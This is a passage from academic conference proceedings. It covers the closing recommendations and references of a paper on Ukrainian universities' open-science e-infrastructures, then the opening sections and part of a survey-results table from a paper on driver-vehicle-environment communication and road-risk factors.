Crossref and support the Initiative for Open Citations. OUCI aims to simplify the search for scientific publications, to draw the attention of editors to the problem of completeness and quality of metadata of Ukrainian scientific publications, to improve the presentation of Ukrainian scientific publications in specialized search engines (e.g., Dimensions, Lens.org, 1findr, Scilit), which can expand their readership. It will allow bibliometrists to freely study the relationships between authors and documents from various scientific disciplines, in particular, in the field of Social Sciences and Humanities [67]. In the transition to Open Science, there is a particular problem of clarification, specifics and evaluation of research in the Social Sciences and Humanities, which requires consideration of their wealth, diversity, interdisciplinarity, national context and stakeholders [68, p. 258].
4 Recommendations The generalised results of this study provide grounds for recommendations to the Open Science subjects on the implementation of priority measures for the formation and development of Ukrainian universities’ research e-infrastructures at the national and university levels, in particular: 4.1 National Level 1. To identify indicators for evaluating the state of research infrastructure and participation in international and national research projects of higher education institutions. 2. To develop national procedures and indicators for quality assurance of research activities based on the Open Science principles and approaches.
Modelling the Universities’ E-Infrastructure
293
3. To develop a digital platform “Ukrainian Open Science” for the national system of quality assurance of research activities based on the Open Science principles and approaches. 4. To design the national citation database UkrScience. 5. To improve the system of higher education and research institutions’ state funding per the quality of their research activities results by introducing the criteria and indicators for ensuring the quality of research activities based on the Open Science principles and approaches. 6. To provide support and encouragement for developing national research infrastructures that ensure Open Access and their integration into European and global research e-infrastructure ecosystems. 7. To promote the development of citizen science, engage a wide range of stakeholders (universities, companies, research and policy organisations) in the process of knowledge co-creation, actively setting the agenda, crowdsourcing via web platforms, and collecting and analysing a broad spectrum of research data. 4.2 University Level 1. To develop a roadmap for the development of institutional infrastructures, providing the possibility of their integration into relevant national, European and global research infrastructures. 2. To provide university researchers access to university and external research infrastructures (e.g., private sector research institutions), including remote access. 3. To support and strengthen collaboration between academia and the non-academic sector to bolster the role of universities as central actors in innovation ecosystems. 4. To provide researchers training on using Open Science opportunities and tools to implement the idea of research openness. 5. In educational and research activities, it is advisable to use a set of ICT solutions, including planning software, cloud technologies, platforms for correspondence, calendars, joint documents, and software for learning and communication in real-time. 6. In the research process, it is advisable to use real-time communication tools (Google Meet, Microsoft Teams, Zoom) to collect quality interview data, conduct group events, expert evaluation, Delphi analysis, foresight, and evaluation centres.
5 Conclusions 1. The lack of a single approach among researchers and practitioners on defining the concept of an “open science” and the structure of its main components is found based on the conceptual approaches analysis in scientific publications, documents of UNESCO, EU, and European University Association. The complex of main structural components of the modern open science ecosystem is proposed and substantiated based on the existing approaches generalisation; it consists of: open research data; open access to publications; citizen science; education and skills; research responsibility and integrity; research performance evaluation. The open science ecosystem is considered as a new paradigm of policy and research activity organisation for all actors under the digital transformations and growing demands from society on
294
I. Drach et al.
openness, inclusiveness, responsibility, and innovative character of science. The key components and necessary conditions for creating and developing the open science ecosystem are the sufficiently functioning in its structure the ecosystem of research e-infrastructures. 2. It has been found that implementing Open Science practices in universities requires the creation and support for the development of Open Science institutional research infrastructures, increasing their accessibility, harmonising the functioning of institutional infrastructures with research infrastructures at the national, European and global levels. The complex of ICT solutions significantly boosters the educational/research activities process and includes planning software, cloud technologies, platforms for correspondence, calendaring, shared documents, and software for learning and real-time communication. 3. The model of research e-infrastructures ecosystem of Ukrainian universities is proposed and theoretically substantiated; it is grounded on a network approach, includes a set of managed network environments (organisational practices, technical infrastructures, social structures), is designed to ensure the uninterrupted activity of the universities’ open science key structural components at the institutional, national, European and world levels. The advantages of the proposed model are: (1) a clear structuring of the key components of Open Science; (2) openness and flexibility regarding its functional filling with appropriate e-infrastructural resources and tools (including the university’s research activity specifics, existing external and internal research e-infrastructure, etc.). 4. Based on the EU documents on developing EHEA and ERA analysis, recommendations on the implementation of priority measures for the formation and development of research e-infrastructures of Ukrainian universities at the national and university levels are offered. The proposed model reflects the main spheres and policy directions for creating and developing the universities’ open science research e-infrastructures ecosystem; it has been developed taking into account the existing national research e-infrastructure, open scientific ecosystem and research e-infrastructures of the EU. Its implementation is desired to create opportunities for researchers, faculty, students and all other members of research communities to be involved in the processes of open science at all stages of research, will promote the development of university research activities, ensure the effective functioning of the entire open science ecosystem in Ukraine, the formation of a strong national research area, create conditions for successful integration to the ERA and EHEA.
References 1. European University Association. The EUA Open Science Agenda 2025 (2022). https://bit. ly/3ObZAUb 2. Lugovyi, V., et al.: Theoretical bases of increasing the research capacity of Ukrainian universities in the context of implementing the concept of “open science”: analytical materials. In: Lugovyi, V., Petroye, O. (eds.). Institute of Higher Education of NAES of Ukraine, Kyiv (2021). https://doi.org/10.31874/978-617-7644-53-7-2021
Modelling the Universities’ E-Infrastructure
295
3. Cabinet of Ministers of Ukraine. Audit of the Economy of Ukraine 2030 (2020). https://nes 2030.org.ua/docs/doc-audit.pdf 4. Ministry of Education and Science of Ukraine. Survey on Institutional Repositories, Open Science and Willingness to Cooperate with the National Repository of Academic Texts (2020). https://bit.ly/3n88XID 5. United Nations Conference on Trade and Development. Technology and Innovation Report 2021. Catching Technological Waves. Innovation with Equity. United Nations (2021). https:// bit.ly/3NcCdIH 6. President of Ukraine. Issues of the National Council for the Recovery of Ukraine from the Consequences of the War (266/2022) (2022). https://zakon.rada.gov.ua/laws/show/266/2022 7. Friesike, S., Widenmayer, B., Gassmann, O., Schildhauer, T.: Opening science: towards an agenda of open science in academia and industry. J. Technol. Transf. 40(4), 581–601 (2014). https://doi.org/10.1007/s10961-014-9375-6 8. Vicente-Saez, R., Martinez-Fuentes, C.: Open science now: a systematic literature review for an integrated definition. J. Bus. Res. 88, 428–436 (2018). https://doi.org/10.1016/j.jbusres. 2017.12.043 9. Fecher, B., Sokolovska, N., Völker, T., Nebe, P., Kahn, R.: Making a research infrastructure: conditions and strategies to transform a service into an infrastructure. Sci. Public Policy 48(4), 499–507 (2021). https://doi.org/10.1093/scipol/scab026 10. McKiernan, E.C., et al.: Point of view: how open science helps researchers succeed. Elife 5, e16800 (2016). https://doi.org/10.7554/elife.16800 11. Laine, H.: Open science and codes of conduct on research integrity. Informaatiotutkimus 37(4) (2018). https://doi.org/10.23978/inf.77414 12. Valzano, V.: Open Science: new models of scientific communication and research evaluation. SCIRES-IT 10, 1–12 (2020). https://doi.org/10.2423/i22394303v10Sp5 13. Maddi, A.: Measuring open access publications: a novel normalized open access indicator. Scientometrics 124(1), 379–398 (2020). https://doi.org/10.1007/s11192-020-03470-0 14. Forsberg, E.-M., Gerber, A., Carson, S.G.: Including responsible research and innovation (RRI) in the development and implementation of horizon Europe. RRI Tools blog (2020). https://bit.ly/3bjrCP9 15. Tijdink, J., Horbach, S., Nuijten, M., O’Neill, G.: Towards a research agenda for promoting responsible research practices. J. Empir. Res. Hum. Res. Ethics 16(4), 450–460 (2021). https:// doi.org/10.1177/15562646211018916 16. UNESCO. UNESCO Recommendation on Open Science (2021). https://unesdoc.unesco.org/ ark:/48223/pf0000379949 17. Shaping Europe’s Digital Future. EOSC beyond 2020 – Next Steps. European Commission (2020). https://bit.ly/3bdmj3z 18. European Commission, Directorate-General for Research and Innovation, Baker, L., Cristea, I., Errington, T., et al.: Reproducibility of Scientific Results in the EU. Scoping report. In: Lusoli, W. (ed.). Publications Office of the European Union (2020). https://doi.org/10.2777/ 341654 19. European Commission. European Research Infrastructure Consortium (ERIC). What ERIC Is, Related Documents, Requirements and Guidelines (n.d.). https://bit.ly/3OvMGQK 20. European Commission. European Research Infrastructures. What Research Infrastructures are, What the Commission is Doing, Strategy Areas, Funding and News (n.d.). https://bit.ly/ 3HGmvof 21. Hans. Global Research Data Infrastructures: The GRDI2020 Vision. GRDI (2020). https:// bit.ly/3OnAod4 22. Ayris, P., López de San Román, A., Maes, K., Labastida, I.: Open Science and its role in universities: a roadmap for cultural change. Advice paper no. 24. League of European Research Universities (2018). https://bit.ly/2LHg05O
296
I. Drach et al.
23. European University Association. Open Science (n.d.). https://eua.eu/issues/21:open-science. html 24. European Commission. Open Science (2019). https://bit.ly/3QCfatU 25. Chmyr, O.S.: Development of research e-infrastructure in Ukraine: creation of the national repository of academic texts. Stat. Ukraine 87(4), 86–97 (2019). https://doi.org/10.31767/su. 4(87)2019.04.09 26. Orliuk, O.: European’s Union Open Science Policy as a global benchmark for Ukraine: legal environment. Theor. Pract. Intellect. Property 6, 158–172 (2021). https://doi.org/10.33731/ 62021.249468 27. European Higher Education Area. Rome Ministerial Communiqué (2020). https://bit.ly/3tU FnKl 28. European Commission. Ukraine’s Association Agreement to Horizon Europe and Euratom Research and Training Programmes Enters into Force (2022). https://bit.ly/3OevMq0 29. European Commission. Work Programme 2009. Capacities. Part 1. Research Infrastructures (C(2008)4566) (2008). https://bit.ly/3xOwpiO 30. European Commission, Directorate-General for Research and Innovation. Supporting the Transformative Impact of Research Infrastructures on European Research. Report of the High-Level Expert Group to assess the progress of ESFRI and other world class research infrastructures towards implementation and long-term sustainability. Publications Office of the European Union (2020). https://doi.org/10.2777/3423 31. European Commission, Directorate-General for Research and Innovation, Whittle, M., Rampton, J.: Towards a 2030 Vision on the Future of Universities in the Field of R&I in Europe. Publications Office of the European Union (2020). https://doi.org/10.2777/510530 32. European University Association. Universities without walls. A vision for 2030 (2021). https:// bit.ly/3tS9NwG 33. Kirkegaard, J.F.: Toward defining and deploying the European Interest(s). German Marshall Fund (2021). https://bit.ly/3ycnadG 34. Candela, L., Grossi, V., Manghi, P., Trasarti, R.: A workflow language for research einfrastructures. Int. J. Data Sci. Analytics 11(4), 361–376 (2021). https://doi.org/10.1007/ s41060-020-00237-x 35. European Open Science Cloud. Strategic Research and Innovation Agenda (SRIA) of the European Open Science Cloud (EOSC). Version 1.0 (2021). https://bit.ly/3N5BusU 36. European Commission, Directorate-General for Communications Networks, Content and Technology. Shaping the Digital Transformation in Europe. Final Report. Publications Office of the European Union (2020). https://doi.org/10.2759/294260 37. Shaping Europe’s Digital Future. The Digital Europe Programme (2022). https://digital-str ategy.ec.europa.eu/en/activities/digital-programme 38. Novikova, O.F., et al.: Formation of conceptual bases of digital transformation of education and science of Ukraine. Visnyk Ekonomichnoi Nauky Ukrainy. 1(40), 190–198 (2021). https:// doi.org/10.37405/1729-7206.2021.1(40).190-198 39. Cabinet of Ministers of Ukraine. On Approval of the National Economic Strategy for the Period up to 2030 (179) (2021). https://bit.ly/43tGikQ 40. Ministry of Education and Science of Ukraine. On Approval of the Roadmap for the Integration of Ukraine’s Research and Innovation System into the European Research Area (167) (2021). https://bit.ly/3HQ8EvG 41. Cabinet of Ministers of Ukraine. On Approval of the Concept of the State Target Program for Developing Research Infrastructures in Ukraine for the Period up to 2026 (322-r) (2021). https://zakon.rada.gov.ua/laws/show/322-2021-p 42. Cabinet of Ministers of Ukraine. Preparation of Proposals for a Comprehensive Recovery Plan of Ukraine begun (2022). https://bit.ly/3O8ZfS6
Modelling the Universities’ E-Infrastructure
297
43. Department for Business, Energy & Industrial Strategy. Realising the Potential – Final Report of the Open Research Data Task Force. GOV.UK (2018). https://bit.ly/2mZAPmz 44. Childs, S., McLeod, J., Lomas, E., Cook, G.: Opening research data: issues and opportunities. Rec. Manag. J. 24(2), 142–162 (2014). https://doi.org/10.1108/RMJ-01-2014-0005 45. Cabinet of Ministers of Ukraine. Regulations on the National Repository of Academic Texts (541) (2017). https://bit.ly/3MUr5lS 46. Kremen, V.H..: Report on the activities of the national academy of educational sciences of Ukraine in 2021. NAES of Ukraine, Kyiv (2022). https://doi.org/10.37472/zvit2021 47. Moodle. About us. Making Quality Online Education Accessible for All (2022). https://moo dle.com/about/ 48. Sarkar, P., Rahman, Z.: Electronic resources in the virtual learning environment and evaluation of Moodle based learning management system applied at PES Institute of Technology. ELibrary Sci. Res. J. 3(10) (2015). https://bit.ly/3zW7NHU 49. Al-Ajlan, A.S.: A comparative study between E-learning features. In: Pontes, E., Silva, A., Guelfi, A., Kofuji, S.T. (eds.) Methodologies, Tools and New Developments for E-Learning, pp. 191–214. IntechOpen (2012). https://doi.org/10.5772/29854 50. Prometheus. Prometheus – the Largest Online Education Platform in Ukraine (2022). https:// prometheus.org.ua/about-us/ 51. Engaging your Learner with Video in the Classroom Zoom Best Practices and Tips. Center for Innovation in Teaching and Research (2019). https://bit.ly/3HFV3ad 52. Archibald, M., Ambagtsheer, R., Casey, M., Lawless, M.: Using zoom videoconferencing for qualitative data collection: perceptions and experiences of researchers and participants. Int. J. Qual. Meth. 18, 160940691987459 (2019). https://doi.org/10.1177/1609406919874596 53. Zoom Video Communications. Running Engaging Online Events (2020). https://bit.ly/39H SszX 54. Haklay, M., Dörler, D., Heigl, F., Manzoni, M., Hecker, S., Vohland, K.: what is citizen science? the challenges of definition. In: Vohland, K., et al. (eds.) The Science of Citizen Science, pp. 13–33. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-58278-4_2 55. Hecker, S., Haklay, M., Bowser, A., Makuch, Z., Vogel, J., Bonn, A. (eds.): Citizen Science: Innovation in Open Science, Society and Policy. UCL Press (2018). http://www.jstor.org/sta ble/j.ctv550cf2 56. Science | Business. About Us (2022). https://sciencebusiness.net/about-us 57. EU-Citizen.Science. About EU-Citizen.Science (n.d.). https://eu-citizen.science/about/ 58. Ministry of Education and Science of Ukraine. Science for Business in Ukraine: Launch of a Platform for Communication and Effective Interaction (2022). https://bit.ly/39GoyvO 59. Law of Ukraine “On Education” (2017). https://zakon.rada.gov.ua/laws/show/2145-19 60. Phase One Karma (n.d.). https://p1k.org/ 61. Unicheck. Unicheck and Turnitin are Now one Team (2020). https://unicheck.com/ua/blog/ unicheck-ta-turnitin-vidteper-odna-komanda 62. StrikePlagiarism.com. About us (n.d.). https://strikeplagiarism.com/en/about_us.html 63. Ministry of Education and Science of Ukraine. MoES of Ukraine is Interested That More Companies, Like plagiat.pl, Coopered with the Ministry to improve anti-plagiar checks (2018). https://bit.ly/2HMYtsW 64. CrossRef. About us (2021). https://www.crossref.org/about/ 65. Turnitin. iThenticate: Publish with Confidence. Check for Plagiarism with the Tool Academic Publishers Trust (n.d.). https://turnitin.com/products/ithenticate 66. Ministry of Education and Science of Ukraine. A Preliminary Presentation of the National Electronic Information and Information System URIS Took Place (2022). https://bit.ly/3bd 1PI9
298
I. Drach et al.
67. Open Ukrainian Citation Index. How It Works (n.d.). https://ouci.dntb.gov.ua/en/about/howit-works/ 68. Kremen, V.H., Lugovyi, V.I., Reheilo, I.Y., Bazeliuk, N.V., Bazeliuk, O.V.: Openness, digitalization and evaluation in research: general and special issues for social studies and humanities. Inf. Technol. Learn. Tools. 80(6), 243–266 (2020). https://doi.org/10.33407/itlt.v80i6.4155
Optimization of the Communicative Process in the System “Driver-Vehicle-Environment” Volodymyr Lytovchenko(B) and Mykola Pidhornyy Cherkasy State Technological University, Cherkasy, Ukraine [email protected]
Abstract. The article considers the scheme of the communicative process of interaction of the objects of the system “driver-vehicle-environment” (D-V-E). The problem with this process is that the activities of objects (participants) in this system have different origins and properties. But all of them are aimed at fulfilling one goal – movement in the environment of the vehicle under the influence of the driver. Each object of the D-V-E system has its own nature of action, which leads to the need to synchronize them in order to avoid conflicts. When solving a permanent event in the middle of the system, each participant involved in the event has his own ways and means of solving the main goal. To avoid conflicts, it is proposed to impose on each object a system of properties inherent in a person. The article presents a scheme for optimizing communication relationships, based on the reactions of the driver’s senses. Keywords: Communicative process · communicative transport technologies · information system · vehicle · process optimization · multicriteria analysis
1 Introduction When creating information systems for vehicles, there is a need to choose the best of them. Choice means its structure, connections and external parameters. The choice of the best option should be based on a method that can objectively compare the effectiveness of existing alternatives. The efficiency of the D-V-E system means the degree of its compliance with its purpose. The scientific basis of the objective method of evaluating the effectiveness of D-V-E is a generalized representation of the dynamics of its operation, which leads to a generalized critrion of effectiveness. When creating new systems, two tasks are usually solved: 1) comparison of technical level of the D-V-E system with technical level of development; 2) comparison of separate alternatives of the D-V-E system created among themselves. In the first case, absolute forms of criteria are most often used; in the second – relative. The synthesis of the criterion begins with the study of the goal facing the researcher. To achieve this goal, it is necessary to create an orderly process of communication between the objects of the D-V-E system. The goal of DV-E needs to solve lowerorder problems in order to create it. Each such task must be performed by a subsystem or group of subsystems that are part of the D-V-E. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 299–320, 2023. https://doi.org/10.1007/978-3-031-35467-0_20
300
V. Lytovchenko and M. Pidhornyy
Modern automobile corporations use biometric technologies to improve communication systems between the driver and the vehicle. All of them are aimed at monitoring biometric parameters and identification of individuals [1–4]. The purpose of applications is to ensure the security of private property. Such technologies are gradually moving to the connection between the psychophysical state of the driver and the process of driving a vehicle. The development of information technologies and the introduction of network capabilities of the Internet expand the communication capabilities of the D-V-E system. At the top of automotive communication systems is the concept of “Vehicle to Everything Communications” (V2X) [5–9]. It is not new to the automotive industry, but the technology to create it, as well as the necessary communication standards, became available several years ago. V2X is the main category of the wide range of communication technologies needed to achieve the goal of connecting the vehicle to the world and the driver in the B-T-C system. V2X is not a static set of communication processes, but embodies the synergy between different technologies. There are seven types of vehicle applications in the V2X concept: 1) Vehicle to network (V2N); 2) Vehicle to infrastructure (V2I); 3) Vehicle to vehicle (V2V); 4) Vehicle to cloud (V2C); 5) Vehicle to pedestrian (V2P); 6) Vehicle to device (V2D); 7) Vehicle to grid (V2G). V2N allows vehicles to use cellular networks to communicate with the V2X control system. V2N also uses a specialized communication standard (DSRC) to interact with other vehicles as well as road infrastructure. V2I is an integral part of Intelligent Transport Systems (ITS), which consists of the twoway exchange of information between vehicles and road infrastructure. This information includes data on the movement of vehicles collected from other vehicles, data from sensors installed on the road infrastructure (cameras, traffic lights, lanterns, road signs, parking meters, etc.), as well as data transmitted from the ITS (speed limits, weather conditions, accidents, etc.). V2V allows vehicles to exchange data in real time. This exchange is carried out by wireless communication via dedicated shortrange communication (DSRC), the same ones used in V2I communication. V2C uses V2N access to broadband cellular networks to communicate with the cloud. V2P creates a communicative Internet connection between vehicles and pedestrians. V2D from car to device is a subset of V2X communication that allows vehicles to share information with any smart device, usually via Bluetooth (Apple CarPlay and Google Android Auto). V2G provides bidirectional data exchange between electric vehicles. The purpose of the publication is to optimize the system of interaction between the driver, the vehicle and the environment, by streamlining the communication processes in the D-V-E system. Formulation of the problem. Many automakers integrate information technology into vehicles. Such intelligent systems use systems for monitoring the environment, vehicle performance, interior and biometric data of the driver. The biggest obstacle in the development of an intelligent system is the disordered processes of interactions in the ITS [10]. Instead of switching to autonomous vehicles, this approach increases the workload of drivers. The following problems arise in the transition from the current vehicle to an intelligent vehicle based on modern vehicles. The existing transport infrastructure needs to be
Optimization of the Communicative Process in the System
301
upgraded to ensure the full integration of intelligent vehicles, while remaining relevant for conventional vehicles. Therefore, the current driving paradigms will have to change with the levels of intellectualization and autonomy [11, 12]. Current research on intelligent vehicles to create a communicative system D-V-E mainly covers such aspects [13]: 1) analysis of behavior, facial expressions and emotional state of drivers; 2) perception of the environment in the synergy of monitoring and analysis systems; 3) limit of reaction and psychophysical properties of the driver; 4) combination of the vehicle management model with environmental data obtained on the basis of environmental perception, for the implementation of the communication process of the V-E subsystem; 5) vehicle traffic control system studies kinematics, dynamics modeling and control systems to create a knowledge base and further intellectualization; 6) active security system is focused on avoiding obstacles and against collisions in various cases, but does not participate in the decisionmaking processes of the intelligent system, only coordinates; 7) traffic monitoring, navigation and coordination of vehicles mainly study the organization of traffic flows; 8) with V2V, interaction and communication take place without forecasting events, and accounting through the vehicle; 9) military applications of the intelligent vehicle system only in military vehicles; 10) vehicle is created on its structural issues and organizational issues of the system of intellectualization of the vehicle, thus limiting the communicative processes of the system D-V-E; 11) vehicle safety investigates the avoidance of road accidents and the expansion of intellectual functions. Sensation is the simplest cognitive process of reflection in the brain of certain qualities and properties of objects due to the action of the stimulus on the analyzer. The most common are: visual, auditory and tactile (touch). The level of automation of the D-V-E system is to reduce the entropy of the human senses involved in controlling the system as a whole and create for the driver the information flow of control and analytical nature. In modern transport systems the automation is limited. If you imagine the automation of vehicles in the form of levels, then widely used Advanced Driver Assistance Systems (ADAS) have identified Society of Automotive Engineers (SAE) [14, 15], which are intended to assist drivers by simplifying tasks for the driver or partially or completely eliminate his impact. ADAS directly affects the performance of the driver. Experienced drivers perform most driving tasks at the level of rules or skills, so the probability of errors is low. Successful performance of a knowledgebased task depends largely on the driver’s fundamental cognitive abilities to diagnose and analyze situations. Accordingly, expanding the knowledge base, intellectual vehicles should mimic the psychological structure of human, i.e. to accumulate situational awareness [16, 17]. SAE levels are determined by the activities and responsibilities of the driver while driving, not by the capabilities of the vehicle’s autonomous system. Levels cannot determine all the effects that technology will have on the model of movement, operation and safety of vehicles [18]. At each level there are some kinds of conflicts. At the first levels, the driver’s influence on the system increases. And therefore there is a greater probability of dangerous movement, due to the human factor. But with an increase in the level of automation and autonomy, the role of an observer begins to stand out for the driver. Such conditions of operation of the vehicle are also dangerous. They are associated with a
302
V. Lytovchenko and M. Pidhornyy
number of hazards, such as: noninterference if necessary; excessive trust in hardware and software; loss of awareness of the situation; deterioration of work skills; intermittent mental load; behavioral adaptation; inadequate mental model of automation capabilities and skills degradation. Since the intervention often occurs unexpectedly and requires a rapid response, this task is difficult and causes a high load. At the level of autonomy, partially automated driving changes the role of the driver from active control of the vehicle to passive control of automation. The driver acts as the operator of the automatic system, which for its intended purpose is separated from the D-V-E system. There is a fragmentation into subsystems (D-V, V-E, D-E), which leads to diversity and inability to perform a common, basic task.
2 Materials and Methods The complexity of the process of automation of the D-V-E system is associated with numerous negative processes, such as: noninterference if necessary; excessive trust in hardware and software; loss of awareness of the situation; deterioration of work skills; behavioral adaptation; inadequate mental model of automation capabilities and stagnation of driving skills. Since the intervention often occurs unexpectedly and requires a rapid response; this task is difficult and causes a high load on the driver. The authors conducted research on the basis of the Cherkasy scientific research forensic center of the Ministry of internal affairs of Ukraine (Cherkasy SRFC of the MIA of Ukraine). The organization is located at the address: Ukraine, 18009, Cherkasy region, Cherkasy city, Pasterivska st., building 104. The research was carried out within the framework of cooperation between Cherkasy State Technological University and the agreement No. 13-D on cooperation dated February 21, 2020. Surveys were conducted in the period May - September 2021. The obtained data were used to form factors that lead to the deterioration of the working conditions of the vehicle, misinformation of the driver and increase the risk of road accidents in general. They are divided into groups. It is assumed that this factor has already taken place or has been implemented and in particular concerns the driver, not the passengers. Below are the following three criteria for evaluation: 1) the severity of the consequences – the criterion determines the degree of impact on the performance of the vehicle after the event; 2) the probability of occurrence – indicates how likely it is that the factor will occur; 3) the significance of the action – characterizes how important is the factor for the vehicle to fulfill its main purpose (movement in space). Each factor and criterion is evaluated from 1 to 10 (where 1 is a very low level of influence and 10 is a very high level of influence). The research was conducted through questionnaires, surveys, methods of collective expert evaluation and multicriteria analysis. Five hundred respondents from various fields of activity related to the operation of vehicles were interviewed. The survey was conducted by the authors of the publication and four experts in automotive science with scientific degrees were invited as experts. The results are summarized in Table 1. An assessment was given to each respondent by the method of multicriteria analysis [19].
Optimization of the Communicative Process in the System
303
3 Experiments To solve the problem of evaluating respondents, using the methods of multicriteria analysis, the results of an individual survey of experts were first processed. The expert survey was conducted according to the Delphi method. This is the most common method of questionnaires, where there are no direct collective discussions, and the results do not depend on the answers of an expert. The obtained assessments were weighed by multiplying them by the coefficient of competence of each expert, which was determined by the method of collective expert assessment of this expert. Given that the number of experts was small and their activities were related to ITS, that they were all specialists and had scientific degrees, the coefficients of competence were virtually the same. The results of factor estimates are shown in Table 1. The next stage in the formation of evaluation of results is the compilation of the arithmetic mean of each factor. According to the respondents, an assessment of the impact factors was obtained according to the three above criteria. The results of factor assessments are shown in Table 1. Respondents’ assessments may differ significantly from expert assessments due to the coefficients of competence, awareness and argumentation. To objectively compare the results of the survey of experts and respondents, the authors used a master key of assessments. It provides unified estimates that can be used to compare survey results. Comparing only the assessments of respondents and experts is not objective for a number of reasons, such as: variety of used vehicles among the respondents, age of respondents, total driving experience, different location of vehicles, different intensity of vehicle operation, purpose of used vehicles and diverse social attitude to vehicles.
304
V. Lytovchenko and M. Pidhornyy
Table 1. Summary table for assessing the factors of influence on the results of the survey Name of group/factor
Respondent Weight
Probability
Significance
Weight
Expert Probability
Significance
Weight
Master key Probability
Significance
1
2
3
4
5
6
7
8
9
10
5.1
4
4
5
6
3
3
1. Strategic level group (route planning) 1.1. Traffic intensity
4.3
4.9
1.1.1. Low
3.1
4.8
5.0
4
5
5
5
3
1
1.1.2. Average
4.2
4.8
5.0
4
5
5
5
4
3
1.1.3. High
4.9
5.0
5.3
5
5
5
6
4
4
1.1.4. Above high
5.2
5.2
5.3
5
5
5
8
1
5
1.2. Deviation from the route
8.3
5.1
8.8
4
4
4
2
5
6
1.3. Change of destination
3.0
3.7
3.3
3
3
3
1
1
3
1.4. Road accident
6.7
5.9
6.8
8
5
8
9
5
9
1.5. Gestures of the regulator or other drivers
1.3
0.8
2.3
2
2
2
1
1
4
1.6. Vehicle damage
6.7
5.5
6.5
7
6
6
7
3
8
1.7. Inexperience of the driver of the vehicle
6.7
6.4
6.7
8
4
8
5
5
5
1.8. Changing the direction of movement of other vehicles
5.6
4.4
4.1
5
5
5
1
5
2
1.9. Seizure or misappropriation of a vehicle
7.6
6.0
6.9
9
5
10
1
3
1
1.10. Lack of road signs and markings
6.9
6.6
6.6
7
7
7
1
2
5
1.11. Violation of traffic rules
9.1
5.6
8.2
8
8
8
9
2
8
1.11.1. Alcohol or drug intoxication
9.0
8.0
8.7
9
9
9
10
3
10
1.11.2. Exceeding the allowable speed
7.7
7.6
7.6
8
8
8
9
6
3
1.11.3. Mobile phone conversations
4.1
5.8
4.8
4
4
4
2
6
1
1.11.4. Use of defective vehicle
7.5
6.5
7.0
8
4
8
9
1
10
(continued)
Optimization of the Communicative Process in the System
305
Table 1. (continued) Name of group/factor
Respondent Weight
Probability
Significance
Weight
Expert Probability
Significance
Weight
Master key Probability
Significance
1.11.5. Conversations with passengers
2.2
3.6
2.0
3
3
3
1
5
1
1.11.6. Smoking while driving
1.0
2.6
1.1
2
2
2
1
4
1
1.11.7. Eating while driving
2.3
2.0
1.8
2
2
2
2
2
1
1.11.8. Management of electronic means while driving
6.1
5.9
5.8
5
5
5
2
5
2
1.11.9. Listening to music
1.1
6.3
4.1
6
6
8
1
6
1
1.12. Ignore security
7.0
6.9
6.8
9
5
9
3
3
5
Continuation of Table 1 1
2
3
4
5
6
7
8
9
10
1.12.1. Unbuckled seat belts
6.6
5.8
5.4
8
8
8
2
4
2
1.12.2. Defective active and passive safety devices
7.7
8.2
5.4
9
4
9
2
2
2
1.12.3. Lack of security measures
9.1
5.6
8.4
9
5
10
2
6
3
1.12.4. Extra items in the cabin and on the body of the vehicle
5.2
4.8
4.9
4
4
4
4
4
4
1.12.5. Dangerous position of the driver and passengers
6.3
5.4
5.3
8
4
8
6
2
2
1.13. Changes in the psychophysical condition and health of the driver
6.8
5.8
6.4
8
8
8
9
2
8
1.13.1. Fatigue
6.8
6.5
6.8
7
7
7
6
3
3
1.13.2. Drowsiness
7.0
6.2
6.6
6
6
6
5
2
2
1.13.3. Dizziness
6.9
5.6
6.5
6
6
6
8
1
8
1.13.4. Anxiety
6.8
4.3
6.7
7
4
7
1
1
1
1.13.5. Decreased observation
6.8
5.1
6.8
8
4
9
3
1
1
(continued)
306
V. Lytovchenko and M. Pidhornyy Table 1. (continued)
Name of group/factor
Respondent Weight
Probability
Significance
Weight
Expert Probability
Significance
Weight
Master key Probability
Significance
1.13.6. The effect of drugs
7.3
6.7
6.8
8
4
8
5
1
1
1.13.7. The effect of alcohol and drugs
9.2
8.2
6.8
10
6
9
10
3
10
1.13.8. The medical examination was not performed properly
4.1
4.3
4.0
3
3
3
1
1
1
1.13.9. Blinding
7.0
6.0
6.6
6
6
6
3
3
3
1.13.10. Allergy
7.0
5.4
6.8
4
4
4
1
1
1
1.13.11. Occurrence of a stressful situation
6.2
5.6
6.1
8
8
8
2
2
2
2. Operational level group (route movement) 2.1. Poor visibility
5.9
6.3
5.3
8
4
8
7
3
3
2.2. Guilt of another traffic participant
4.3
5.2
5.2
6
6
6
5
5
5
2.2.1. Random
4.3
5.1
5.5
6
6
6
5
5
5
2.2.2. Not accidental
4.2
5.2
5.0
6
6
6
5
5
5
2.3. Hitting an obstacle
6.7
5.7
6.2
6
6
6
2
1
1
2.4. Reduction of braking distance
6.1
3.3
4.1
3
3
3
2
1
2
2.5. The presence of sound signals
5.0
5.0
4.2
4
5
4
1
3
1
2.6. Abrupt changes in the direction of movement
6.3
6.0
7.2
8
8
8
4
2
2
2.7. Negligent attitude to the technical condition of the vehicle
6.2
6.2
4.8
8
4
8
6
2
2
2.8. Traffic accident
7.3
6.1
7.0
10
4
9
5
5
9
2.8.1. With the participation of vehicle
7.3
6.3
7.0
10
4
9
5
5
9
2.8.2. Without the participation of the vehicle
7.3
6.0
6.8
10
4
9
5
5
9
(continued)
Optimization of the Communicative Process in the System
307
Table 1. (continued) Name of group/factor
Respondent Weight
Probability
Significance
Weight
Expert Probability
Significance
Weight
Master key Probability
Significance
2.9. Occurrence of an emergency situation
7.2
5.6
6.3
9
4
9
10
3
10
Continuation of Table 1 1
2
3
4
5
6
7
8
9
10
2.9.1. Observation error
6.1
5.5
5.9
8
5
8
8
2
6
2.9.2. Wrong decision or action
8.5
4.8
6.7
9
5
8
7
2
6
2.9.3. Insufficient reaction
6.3
5.9
6.1
8
4
8
7
2
6
2.9.4. An unpredictable situation
8.2
6.5
6.6
8
4
8
5
2
6
2.10. Lack of a planned route
4.4
2.1
2.4
3
3
3
1
1
1
2.11. Unknown location for the driver
6.2
6.0
3.3
4
4
4
1
1
1
2.12. Low wheel grip
5.9
5.8
5.8
6
6
6
2
1
1
2.13. Unplanned stop
6.2
5.1
5.8
4
4
4
1
1
1
2.13.1. Unforeseen damage to the vehicle
5.6
4.9
4.8
8
4
4
4
2
2
2.13.2. Failure of the power unit
5.9
5.0
5.6
8
3
3
6
2
2
2.13.3. Failure of electrical equipment
5.5
4.6
